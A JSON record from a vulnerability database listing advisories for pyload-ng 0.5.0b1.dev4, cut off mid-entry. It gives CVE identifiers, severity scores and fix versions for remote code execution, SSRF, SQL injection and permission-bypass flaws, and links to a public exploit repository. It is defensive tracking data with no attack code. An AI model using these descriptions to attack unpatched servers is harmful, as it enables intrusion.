{"url":"http://public2.vulnerablecode.io/api/packages/81661?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b1.dev4","type":"pypi","namespace":"","name":"pyload-ng","version":"0.5.0b1.dev4","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.5.0b3.dev36","latest_non_vulnerable_version":"0.20","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46404?format=json","vulnerability_id":"VCID-1vbk-b2hr-tydh","summary":"An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39205","reference_id":"","reference_type":"","scores":[{"value":"0.83924","scoring_system":"epss","scoring_elements":"0.99316","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39205"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205","reference_id":"CVE-2024-39205","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39205"},{"reference_url":"https://github.com/advisories/GHSA-h95x-26f3-88hr","reference_id":"GHSA-h95x-26f3-88hr","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h95x-26f3-88hr"},{"reference_url":"https://github.com/advisories/G
HSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r9pp-r4xf-597r"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r","reference_id":"GHSA-r9pp-r4xf-597r","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r9pp-r4xf-597r"},{"reference_url":"https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main","reference_id":"main","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/Marven11/CVE-2024-39205-Pyload-RCE/tree/main"},{"reference_url":"https://github.com/pyload/pyload","reference_id":"pyload","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-30T20:48:52Z/"}],"url":"https://github.com/pyload/pyload"}],"
fixed_packages":[],"aliases":["CVE-2024-39205","GHSA-r9pp-r4xf-597r"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1vbk-b2hr-tydh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71755?format=json","vulnerability_id":"VCID-37r9-s7me-ubf1","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, the parse_urls API function in src/pyload/core/api/__init__.py fetches arbitrary URLs server-side via get_url(url) (pycurl) without any URL validation, protocol restriction, or IP blacklist. An authenticated user with ADD permission can make HTTP/HTTPS requests to internal network resources and cloud metadata endpoints, read local files via file:// protocol (pycurl reads the file server-side), interact with internal services via gopher:// and dict:// protocols, and enumerate file existence via error-based oracle (error 37 vs empty response).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35187","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12626","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35187"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35187","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35187"},{"reference_url":"https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f","reference_id":"4032e57d61d8f864e39f4dcfdb567527a50a9e1f","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system"
:"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/"}],"url":"https://github.com/pyload/pyload/commit/4032e57d61d8f864e39f4dcfdb567527a50a9e1f"},{"reference_url":"https://github.com/advisories/GHSA-2wvg-62qm-gj33","reference_id":"GHSA-2wvg-62qm-gj33","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2wvg-62qm-gj33"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33","reference_id":"GHSA-2wvg-62qm-gj33","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:03:24Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-2wvg-62qm-gj33"}],"fixed_packages":[],"aliases":["CVE-2026-35187","GHSA-2wvg-62qm-gj33"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37r9-s7me-ubf1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105650?format=json","vulnerability_id":"VCID-4e9n-1qw5-sucs","summary":"pyload is an open-source Download Manager written in pure Python. An unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows unauthenticated remote attackers to execute arbitrary code in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system remote code execution. 
Commit 909e5c97885237530d1264cfceb5555870eb9546, the patch for the issue, is included in version 0.5.0b3.dev89.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53890","reference_id":"","reference_type":"","scores":[{"value":"0.0107","scoring_system":"epss","scoring_elements":"0.78148","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53890"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53890","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53890"},{"reference_url":"https://github.com/pyload/pyload/pull/4586","reference_id":"4586","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/pull/4586"},{"reference_url":"https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546","reference_id":"909e5c97885237530d1264cfceb5555870eb9546","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546"},{"reference_url":"https://github.com/advisories/GHSA-8w3f-4r8f-pf53","reference_id":"GHSA-8w3f-4r8f-pf53","reference_type":"","scores":[],"url":"https://
github.com/advisories/GHSA-8w3f-4r8f-pf53"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53","reference_id":"GHSA-8w3f-4r8f-pf53","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-07-15T13:24:23Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378395?format=json","purl":"pkg:pypi/pyload-ng@0.20","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.20"}],"aliases":["CVE-2025-53890","GHSA-8w3f-4r8f-pf53"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4e9n-1qw5-sucs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71694?format=json","vulnerability_id":"VCID-4u3t-ct2r-ykc3","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev97, the ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all. 
This vulnerability is fixed in 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35586","reference_id":"","reference_type":"","scores":[{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06593","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35586"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-123.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-123.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35586","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35586"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"GHSA-ppvx-rwh9-7rj7","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T18:16:06Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40238?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev97","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5r
r2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev97"}],"aliases":["CVE-2026-35586","GHSA-ppvx-rwh9-7rj7","PYSEC-2026-123"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4u3t-ct2r-ykc3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/121404?format=json","vulnerability_id":"VCID-5jgf-dcg2-w7ed","summary":"pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. 
This issue has been patched in version 0.5.0b3.dev91.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55156","reference_id":"","reference_type":"","scores":[{"value":"0.00212","scoring_system":"epss","scoring_elements":"0.43783","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-55156"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55156","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-55156"},{"reference_url":"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f","reference_id":"134edcdf6e2a10c393743c254da3d9d90b74258f","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"},{"reference_url":"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271","reference_id":"file_database.py#L271","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"},{"reference_url":"https://github.com/advis
ories/GHSA-pwh4-6r3m-j2rf","reference_id":"GHSA-pwh4-6r3m-j2rf","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-pwh4-6r3m-j2rf"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf","reference_id":"GHSA-pwh4-6r3m-j2rf","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-08-12T15:49:23Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/34145?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev91","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev91"}],"aliases":["CVE-2025-55156","GHSA-pwh4-6r3m-j2rf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5jgf-dcg2
-w7ed"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/70568?format=json","vulnerability_id":"VCID-5tq7-5rr2-hke4","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, the set_config_value() API method (@permission(Perms.SETTINGS)) in src/pyload/core/api/__init__.py gates security-sensitive options behind a hand-maintained allowlist ADMIN_ONLY_CORE_OPTIONS. The option (\"general\", \"ssl_verify\") is not on that allowlist. Any authenticated user with the non-admin SETTINGS permission can set general.ssl_verify = off, and every subsequent outbound pycurl request is made with SSL_VERIFYPEER=0 and SSL_VERIFYHOST=0 — TLS peer and hostname verification are fully disabled. An on-path attacker can then present forged certificates for any hostname pyload fetches. This is a direct continuation of the fix family CVE-2026-33509 / CVE-2026-35463 / CVE-2026-35464 / CVE-2026-35586, each of which patched a different missed option in the same allowlist. 
This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42312","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05647","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42312"},{"reference_url":"https://github.com/advisories/GHSA-4744-96p5-mp2j","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppvx-rwh9-7rj7"},{"reference_url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7mc-x6x7-cqxx"},{"reference_url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w48f-wwwf-f5fr"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-126.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_syst
em":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-126.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42312","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42312"},{"reference_url":"https://github.com/advisories/GHSA-ccxc-x975-4hh9","reference_id":"GHSA-ccxc-x975-4hh9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ccxc-x975-4hh9"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9","reference_id":"GHSA-ccxc-x975-4hh9","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T18:50:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ccxc-x975-4hh9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42312","GHSA-ccxc-x975-4hh9","PYSEC-2026-126"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VC
ID-5tq7-5rr2-hke4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/218410?format=json","vulnerability_id":"VCID-5v6x-k9wj-zybu","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the set_package_data() API function call inside the data object with key \"_folder\", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42315","reference_id":"","reference_type":"","scores":[{"value":"0.0006","scoring_system":"epss","scoring_elements":"0.19101","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42315"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-838g-gr43-qqg9"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2026-129.yaml"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42315","reference_id":"","reference_type":"","scores":[{"va
lue":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42315"},{"reference_url":"https://github.com/advisories/GHSA-838g-gr43-qqg9","reference_id":"GHSA-838g-gr43-qqg9","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-838g-gr43-qqg9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-42315","GHSA-838g-gr43-qqg9","PYSEC-2026-129"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5v6x-k9wj-zybu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57553?format=json","vulnerability_id":"VCID-64ux-jb56-gub5","summary":"pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, e.g. when a download is finished. By downloading an executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. 
